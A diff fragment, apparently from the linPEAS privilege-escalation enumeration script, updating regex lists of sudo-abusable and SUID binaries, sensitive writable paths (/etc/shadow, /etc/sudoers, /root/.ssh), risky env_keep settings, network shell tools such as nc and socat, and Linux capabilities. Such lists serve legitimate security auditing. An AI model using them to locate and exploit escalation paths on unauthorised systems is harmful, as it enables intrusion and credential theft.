ALL|ALL|env_keep|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" +sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|env_keep|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount|/restic|/usermod|/sbin/ldconfig|/usr/sbin/ldconfig|ldconfig -f|--password-command|--password-file|-o ProxyCommand|-o PreferredAuthentications" sudoG="NOEXEC" -sudoVB1=" \*|env_keep\W*\+=.*LD_PRELOAD|env_keep\W*\+=.*LD_LIBRARY_PATH|env_keep\W*\+=.*BASH_ENV|env_keep\W*\+=.* ENV|[^a-zA-Z0-9]7z$|aa-exec$|[^a-zA-Z0-9]ab$|alpine$|ansible-playbook$|ansible-test$|aoss$|apache2ctl$|apt-get$|[^a-zA-Z0-9]apt$|[^a-zA-Z0-9]ar$|aria2c$|[^a-zA-Z0-9]arj$|[^a-zA-Z0-9]arp$|[^a-zA-Z0-9]as$|ascii-xfr$|ascii85$|[^a-zA-Z0-9]ash$|aspell$|[^a-zA-Z0-9]at$|atobm$|[^a-zA-Z0-9]awk$|[^a-zA-Z0-9]aws$|base32$|base58$|base64$|basenc$|basez$|bash$|batcat$|[^a-zA-Z0-9]bc$|bconsole$|bpftrace$|bridge$|bundle$|bundler$|busctl$|busybox$|byebug$|bzip2$|[^a-zA-Z0-9]c89$|[^a-zA-Z0-9]c99$|cabal$|capsh$|[^a-zA-Z0-9]cat$|cdist$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|choom$|chown$|chroot$|clamscan$|[^a-zA-Z0-9]cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|[^a-zA-Z0-9]cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|[^a-zA-Z0-9]csh$|csplit$|csvtool$|cupsfilter$|curl$|[^a-zA-Z0-9]cut$|dash$|date$|[^a-zA-Z0-9]dc$|[^a-zA-Z0-9]dd$|debugfs$|dialog$|diff$|[^a-zA-Z0-9]dig$|distcc$|dmesg$|dmidecode$|dmsetup$|[^a-zA-Z0-9]dnf$|docker$|dosbox$|dotnet$|dpkg$|dstat$|dvips$|easy_install$|[^a-zA-Z0-9]eb$|[^a-zA-Z0-9]ed$|efax$|elvish$|emacs$|enscript$|[^a-zA-Z0-9]env$|[^a-zA-Z0-9]eqn$|espeak$|[^a-zA-Z0-9]ex$|exiftool$|expand$|expect$|facter$|file$|find$|fish$|flock$|[^a-zA-Z0-9]fmt$|fold$|fping$|[^a-zA-Z0-9]ftp$|gawk$|[^a-zA-Z0-9]gcc$|gcloud$|gcore$|[^a-zA-Z0-9]gdb$|[^a-zA-Z0-9]gem$|genie$|genisoimage$|[^a-zA-Z0-9]ghc$|ghci$|gimp$|ginsh$|[^a-zA-Z0-9]git$|[^a-zA-Z0-9]grc$|grep$|gtester$|gzip$|[^a-zA-Z0-9]hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|[^a-zA-Z0-9]ip$|[^a-zA-Z0-9]irb$|ispell$|[^a-zA-Z0-9]jjs$|[^a-zA-Z0-9]joe$|join$|journalctl$|[^a-zA-Z0-9]jq$|jrunscript$|jtag$|julia$|knife$|[^a-zA-Z0-9]ksh$|ksshell$|[^a-zA-Z0-9]ksu$|kubectl$|latex$|latexmk$|ldconfig$|less$|lftp$|links$|[^a-zA-Z0-9]ln$|loginctl$|logsave$|look$|ltrace$|[^a-zA-Z0-9]lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|[^a-zA-Z0-9]man$|mawk$|minicom$|more$|mosquitto$|mount$|msfconsole$" -sudoVB2="msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|[^a-zA-Z0-9]mtr$|multitime$|[^a-zA-Z0-9]mv$|mysql$|nano$|nasm$|nawk$|[^a-zA-Z0-9]nc$|ncdu$|ncftp$|neofetch$|[^a-zA-Z0-9]nft$|nice$|[^a-zA-Z0-9]nl$|[^a-zA-Z0-9]nm$|nmap$|node$|nohup$|[^a-zA-Z0-9]npm$|nroff$|nsenter$|ntpdate$|octave$|[^a-zA-Z0-9]od$|openssl$|openvpn$|openvt$|opkg$|pandoc$|paste$|[^a-zA-Z0-9]pdb$|pdflatex$|pdftex$|perf$|perl$|perlbug$|pexec$|[^a-zA-Z0-9]pg$|[^a-zA-Z0-9]php$|[^a-zA-Z0-9]pic$|pico$|pidstat$|[^a-zA-Z0-9]pip$|pkexec$|[^a-zA-Z0-9]pkg$|posh$|[^a-zA-Z0-9]pr$|[^a-zA-Z0-9]pry$|psftp$|psql$|[^a-zA-Z0-9]ptx$|puppet$|pwsh$|python$|rake$|[^a-zA-Z0-9]rc$|readelf$|[^a-zA-Z0-9]red$|redcarpet$|restic$|[^a-zA-Z0-9]rev$|rlwrap$|[^a-zA-Z0-9]rpm$|rpmdb$|rpmquery$|rpmverify$|rsync$|ruby$|run-mailcap$|run-parts$|runscript$|rview$|rvim$|sash$|scanmem$|[^a-zA-Z0-9]scp$|screen$|script$|scrot$|[^a-zA-Z0-9]sed$|service$|setarch$|setfacl$|setlock$|sftp$|[^a-zA-Z0-9]sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|softlimit$|sort$|split$|sqlite3$|sqlmap$|[^a-zA-Z0-9]ss$|ssh-agent$|ssh-keygen$|ssh-keyscan$|[^a-zA-Z0-9]ssh$|sshpass$|start-stop-daemon$|stdbuf$|strace$|strings$|[^a-zA-Z0-9]su$|sudo$|sysctl$|systemctl$|systemd-resolve$|[^a-zA-Z0-9]tac$|tail$|[^a-zA-Z0-9]tar$|task$|taskset$|tasksh$|[^a-zA-Z0-9]tbl$|tclsh$|tcpdump$|tdbtool$|[^a-zA-Z0-9]tee$|telnet$|terraform$|[^a-zA-Z0-9]tex$|tftp$|[^a-zA-Z0-9]tic$|time$|timedatectl$|timeout$|tmate$|tmux$|[^a-zA-Z0-9]top$|torify$|torsocks$|troff$|[^a-zA-Z0-9]ul$|unexpand$|uniq$|unshare$|unsquashfs$|unzip$|update-alternatives$|uudecode$|uuencode$|vagrant$|valgrind$|varnishncsa$|[^a-zA-Z0-9]vi$|view$|vigr$|[^a-zA-Z0-9]vim$|vimdiff$|vipw$|virsh$|[^a-zA-Z0-9]w3m$|wall$|watch$|[^a-zA-Z0-9]wc$|wget$|whiptail$|wireshark$|wish$|xargs$|xdg-user-dir$|xdotool$|xelatex$|xetex$|xmodmap$|xmore$|xpad$|[^a-zA-Z0-9]xxd$|[^a-zA-Z0-9]xz$|yarn$|yash$|[^a-zA-Z0-9]yum$|zathura$|[^a-zA-Z0-9]zip$|[^a-zA-Z0-9]zsh$|zsoelim$|zypper$" +sudoVB1=" \*|env_keep\W*\+=.*LD_PRELOAD|env_keep\W*\+=.*LD_LIBRARY_PATH|env_keep\W*\+=.*BASH_ENV|env_keep\W*\+=.* ENV|env_keep\W*\+=.*PATH|!env_reset|!requiretty|[^a-zA-Z0-9]7z$|[^a-zA-Z0-9]R$|aa-exec$|[^a-zA-Z0-9]ab$|[^a-zA-Z0-9]acr$|alpine$|ansible-playbook$|ansible-test$|aoss$|apache2$|apache2ctl$|apt-get$|aptitude$|[^a-zA-Z0-9]ar$|arch-nspawn$|aria2c$|[^a-zA-Z0-9]arj$|[^a-zA-Z0-9]arp$|[^a-zA-Z0-9]as$|ascii-xfr$|ascii85$|[^a-zA-Z0-9]ash$|aspell$|asterisk$|[^a-zA-Z0-9]at$|atobm$|autoconf$|autoheader$|autoreconf$|[^a-zA-Z0-9]aws$|base32$|base58$|base64$|basenc$|basez$|bash$|bashbug$|batcat$|bbot$|[^a-zA-Z0-9]bc$|bconsole$|[^a-zA-Z0-9]bee$|borg$|bpftrace$|bridge$|bundle$|busctl$|busybox$|byebug$|bzip2$|cabal$|cancel$|capsh$|cargo$|[^a-zA-Z0-9]cat$|cdist$|certbot$|chattr$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|choom$|chown$|chroot$|chrt$|clamscan$|clisp$|cmake$|[^a-zA-Z0-9]cmp$|cobc$|code$|codex$|column$|comm$|composer$|cowsay$|cowthink$|[^a-zA-Z0-9]cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|[^a-zA-Z0-9]csh$|csplit$|csvtool$|[^a-zA-Z0-9]ctr$|cupsfilter$|curl$|[^a-zA-Z0-9]cut$|dash$|date$|[^a-zA-Z0-9]dc$|[^a-zA-Z0-9]dd$|debugfs$|dhclient$|dialog$|diff$|[^a-zA-Z0-9]dig$|distcc$|dmesg$|dmsetup$|[^a-zA-Z0-9]dnf$|dnsmasq$|doas$|docker$|dos2unix$|dosbox$|dotnet$|dpkg$|dstat$|dvips$|easy_install$|easyrsa$|[^a-zA-Z0-9]eb$|[^a-zA-Z0-9]ed$|efax$|egrep$|elvish$|emacs$|enscript$|[^a-zA-Z0-9]env$|[^a-zA-Z0-9]eqn$|espeak$|[^a-zA-Z0-9]ex$|exiftool$|expand$|expect$|facter$|fail2ban-client$|fastfetch$|ffmpeg$|fgrep$|file$|find$|finger$|firejail$|fish$|flock$|[^a-zA-Z0-9]fmt$|fold$|forge$|fping$|[^a-zA-Z0-9]ftp$|[^a-zA-Z0-9]fzf$|gawk$|[^a-zA-Z0-9]gcc$|gcloud$|gcore$|[^a-zA-Z0-9]gdb$|[^a-zA-Z0-9]gem$|genie$|genisoimage$|getent$|[^a-zA-Z0-9]ghc$|ghci$|gimp$|ginsh$|[^a-zA-Z0-9]git$|gnuplot$|[^a-zA-Z0-9]go$|[^a-zA-Z0-9]grc$|grep$|gtester$|guile$|gzip$|hashcat$|head$|hexdump$|[^a-zA-Z0-9]hg$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|[^a-zA-Z0-9]ip$|iptables-save$|[^a-zA-Z0-9]irb$|ispell$|java$|[^a-zA-Z0-9]jjs$|[^a-zA-Z0-9]joe$|join$|journalctl$|[^a-zA-Z0-9]jq$|jrunscript$|jshell$|jtag$|julia$|knife$|ksshell$|[^a-zA-Z0-9]ksu$|kubectl$|last$|latex$|latexmk$|ld.so$|ldconfig$|less$|lftp$|links$|[^a-zA-Z0-9]ln$|loginctl$|logrotate$|logsave$|look$|[^a-zA-Z0-9]lp$|ltrace$|[^a-zA-Z0-9]lua$|lualatex$|luatex$|lwp-download$|lwp-request$|[^a-zA-Z0-9]lxd$|[^a-zA-Z0-9]m4$|mail$|make$|[^a-zA-Z0-9]man$|mawk$|minicom$|more$" +sudoVB2="mosh-server$|mosquitto$|mount$|msfconsole$|msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|[^a-zA-Z0-9]mtr$|multitime$|mutt$|[^a-zA-Z0-9]mv$|mypy$|mysql$|nano$|nasm$|[^a-zA-Z0-9]nc$|ncdu$|ncftp$|needrestart$|neofetch$|[^a-zA-Z0-9]nft$|nginx$|nice$|[^a-zA-Z0-9]nl$|[^a-zA-Z0-9]nm$|nmap$|node$|nohup$|[^a-zA-Z0-9]npm$|nroff$|nsenter$|ntpdate$|octave$|[^a-zA-Z0-9]od$|opencode$|openssl$|openvpn$|openvt$|opkg$|pandoc$|passwd$|paste$|[^a-zA-Z0-9]pax$|[^a-zA-Z0-9]pdb$|pdflatex$|pdftex$|perf$|perl$|perlbug$|pexec$|[^a-zA-Z0-9]pg$|[^a-zA-Z0-9]php$|[^a-zA-Z0-9]pic$|pidstat$|[^a-zA-Z0-9]pip$|pipx$|pkexec$|[^a-zA-Z0-9]pkg$|plymouth$|podman$|poetry$|posh$|[^a-zA-Z0-9]pr$|procmail$|[^a-zA-Z0-9]pry$|psftp$|psql$|[^a-zA-Z0-9]ptx$|puppet$|pwsh$|pygmentize$|pyright$|python$|qpdf$|rake$|ranger$|[^a-zA-Z0-9]rc$|readelf$|redcarpet$|redis$|restic$|[^a-zA-Z0-9]rev$|rlogin$|rlwrap$|[^a-zA-Z0-9]rpm$|rpmdb$|rpmquery$|rpmverify$|rsync$|rsyslogd$|rtorrent$|ruby$|run-mailcap$|run-parts$|runscript$|rustc$|rustdoc$|rustfmt$|rustup$|sash$|scanmem$|[^a-zA-Z0-9]scp$|screen$|script$|scrot$|[^a-zA-Z0-9]sed$|service$|setarch$|setcap$|setfacl$|setlock$|sftp$|[^a-zA-Z0-9]sg$|shred$|shuf$|slsh$|smbclient$|snap$|socat$|socket$|soelim$|softlimit$|sort$|split$|sqlite3$|sqlmap$|[^a-zA-Z0-9]ss$|[^a-zA-Z0-9]ssh$|ssh-agent$|ssh-copy-id$|ssh-keygen$|ssh-keyscan$|sshfs$|sshpass$|sshuttle$|start-stop-daemon$|stdbuf$|strace$|strings$|[^a-zA-Z0-9]su$|sudo$|sysctl$|systemctl$|systemd-resolve$|systemd-run$|[^a-zA-Z0-9]tac$|tail$|tailscale$|[^a-zA-Z0-9]tar$|task$|taskset$|tasksh$|[^a-zA-Z0-9]tbl$|tclsh$|tcpdump$|tcsh$|tdbtool$|[^a-zA-Z0-9]tee$|telnet$|terraform$|[^a-zA-Z0-9]tex$|tftp$|[^a-zA-Z0-9]tic$|time$|timedatectl$|timeout$|tmate$|tmux$|[^a-zA-Z0-9]top$|torify$|torsocks$|troff$|[^a-zA-Z0-9]tsc$|tshark$|[^a-zA-Z0-9]ul$|unexpand$|uniq$|unshare$|unsquashfs$|unzip$|update-alternatives$|urlget$|uuencode$|[^a-zA-Z0-9]uv$|vagrant$|valgrind$|varnishncsa$|[^a-zA-Z0-9]vi$|vigr$|[^a-zA-Z0-9]vim$|vipw$|virsh$|volatility$|[^a-zA-Z0-9]w3m$|wall$|watch$|[^a-zA-Z0-9]wc$|wg-quick$|wget$|whiptail$|whois$|wireshark$|wish$|xargs$|xdg-user-dir$|xdotool$|xmodmap$|xmore$|xpad$|[^a-zA-Z0-9]xxd$|[^a-zA-Z0-9]xz$|yarn$|yash$|yelp$|yt-dlp$|[^a-zA-Z0-9]yum$|zathura$|zcat$|zgrep$|[^a-zA-Z0-9]zic$|[^a-zA-Z0-9]zip$|zless$|[^a-zA-Z0-9]zsh$|zsoelim$|zypper$" USEFUL_SOFTWARE="authbind aws az base64 ctr curl doas docker fetch g++ gcc gcloud gdb go kubectl lua lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm" NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so" -OLDPATH=$PATH -ADDPATH=":/usr/local/sbin\ - :/usr/local/bin\ - :/usr/sbin\ - :/usr/bin\ - :/sbin\ - :/bin" -spath=":$PATH" -for P in $ADDPATH; do - if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi -done - -writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"$(echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g') #Add Path but remove simple dot in PATH - -writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" - cfuncs='file|free|main|more|read|split|write' LDD="$(command -v ldd 2>/dev/null || echo -n '')" @@ -1067,27 +1092,47 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent$|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$" sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$" -sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" +sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/hping3$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" -sidVB='/aa-exec$|/ab$|/agetty$|/alpine$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/basez$|/bash$|/batcat$|/bc$|/bridge$|/busctl$|/busybox$|/byebug$|/bzip2$|/cabal$|/capsh$|/cat$|/chmod$|/choom$|/chown$|/chroot$|/clamscan$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dc$|/dd$|/debugfs$|/dialog$|/diff$|/dig$|/distcc$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/efax$|/elvish$|/emacs$|/env$|/eqn$|/espeak$|/expand$|/expect$|/file$|/find$|/fish$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genie$|/genisoimage$|/gimp$|/ginsh$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/jjs$|/joe$|/join$|/jq$|/jrunscript$|/julia$|/ksh$|/ksshell$|/kubectl$|/latex$|/ldconfig$|/less$|/lftp$|/links$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/minicom$|/more$|/mosquitto$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$|/multitime$|/mv$' -sidVB2='/mysql$|/nano$|/nasm$|/nawk$|/nc$|/ncdu$|/ncftp$|/nft$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/ntpdate$|/octave$|/od$|/openssl$|/openvpn$|/pandoc$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pexec$|/pg$|/php$|/pic$|/pico$|/pidstat$|/posh$|/pr$|/pry$|/psftp$|/ptx$|/python$|/rake$|/rc$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmdb$|/rpmquery$|/rpmverify$|/rsync$|/rtorrent$|/run-parts$|/runscript$|/rview$|/rvim$|/sash$|/scanmem$|/scp$|/scrot$|/sed$|/setarch$|/setfacl$|/setlock$|/shuf$|/slsh$|/socat$|/soelim$|/softlimit$|/sort$|/sqlite3$|/ss$|/ssh-agent$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tasksh$|/tbl$|/tclsh$|/tdbtool$|/tee$|/telnet$|/terraform$|/tex$|/tftp$|/tic$|/time$|/timeout$|/tmate$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/unsquashfs$|/unzip$|/update-alternatives$|/uudecode$|/uuencode$|/vagrant$|/varnishncsa$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/w3m$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xdotool$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/yash$|/zip$|/zsh$|/zsoelim$' +sidVB='/R$|/aa-exec$|/ab$|/acr$|/agetty$|/alpine$|/apache2$|/apt-get$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/asterisk$|/atobm$|/aws$|/base32$|/base64$|/basenc$|/basez$|/bash$|/batcat$|/bc$|/bconsole$|/bee$|/bridge$|/busctl$|/bzip2$|/cabal$|/cancel$|/capsh$|/cat$|/chattr$|/chmod$|/choom$|/chown$|/chroot$|/chrt$|/clamscan$|/clisp$|/cmp$|/cobc$|/column$|/comm$|/cp$|/cpio$|/cpulimit$|/crash$|/csh$|/csplit$|/csvtool$|/ctr$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dc$|/dd$|/debugfs$|/dialog$|/diff$|/dig$|/distcc$|/dmesg$|/dmsetup$|/dnsmasq$|/docker$|/dos2unix$|/dosbox$|/dpkg$|/dvips$|/easyrsa$|/ed$|/efax$|/egrep$|/elvish$|/enscript$|/env$|/eqn$|/espeak$|/ex$|/expand$|/expect$|/fastfetch$|/ffmpeg$|/fgrep$|/file$|/find$|/finger$|/fish$|/flock$|/fmt$|/fold$|/forge$|/fping$|/ftp$|/fzf$|/gawk$|/gcloud$|/gcore$|/gdb$|/genie$|/genisoimage$|/getent$|/ginsh$|/git$|/gnuplot$|/grep$|/gtester$|/guile$|/gzip$|/head$|/hexdump$|/hg$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/joe$|/join$|/jq$|/jrunscript$|/julia$|/ksshell$|/kubectl$|/last$|/latex$|/ld.so$|/ldconfig$|/less$|/lftp$|/links$|/logrotate$|/logsave$|/look$|/lp$|/ltrace$|/lua$|/lualatex$|/luatex$|/lxd$|/m4$|/mail$|/make$|/man$|/mawk$' +sidVB2='/minicom$|/more$|/mosquitto$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$|/multitime$|/mv$|/mysql$|/nano$|/nasm$|/nc$|/ncdu$|/ncftp$|/nginx$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/nsenter$|/ntpdate$|/octave$|/od$|/opencode$|/openssl$|/openvpn$|/pandoc$|/paste$|/pax$|/pdflatex$|/pdftex$|/perf$|/perl$|/pexec$|/pg$|/php$|/pic$|/pidstat$|/plymouth$|/pr$|/psftp$|/psql$|/ptx$|/python$|/qpdf$|/rc$|/readelf$|/redis$|/restic$|/rev$|/rlogin$|/rlwrap$|/rpm$|/rpmdb$|/rpmquery$|/rpmverify$|/rsync$|/rtorrent$|/run-parts$|/runscript$|/sash$|/scanmem$|/scp$|/script$|/scrot$|/sed$|/setarch$|/setcap$|/setfacl$|/setlock$|/sftp$|/shred$|/shuf$|/slsh$|/socat$|/socket$|/soelim$|/softlimit$|/sort$|/split$|/sqlite3$|/ss$|/ssh$|/ssh-agent$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/task$|/tasksh$|/tbl$|/tclsh$|/tcpdump$|/tcsh$|/tdbtool$|/tee$|/telnet$|/terraform$|/tex$|/tftp$|/tic$|/time$|/timeout$|/tmate$|/tmux$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/unsquashfs$|/unzip$|/update-alternatives$|/urlget$|/uuencode$|/varnishncsa$|/vi$|/vigr$|/vim$|/vipw$|/volatility$|/w3m$|/watch$|/wc$|/wget$|/whiptail$|/whois$|/wish$|/xargs$|/xdotool$|/xmodmap$|/xmore$|/xpad$|/xxd$|/xz$|/yash$|/zic$|/zip$|/zless$|/zsh$|/zsoelim$' STRACE="$(command -v strace 2>/dev/null || echo -n '')" STRINGS="$(command -v strings 2>/dev/null || echo -n '')" -capsB="=ep|cap_chown|cap_former|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module" 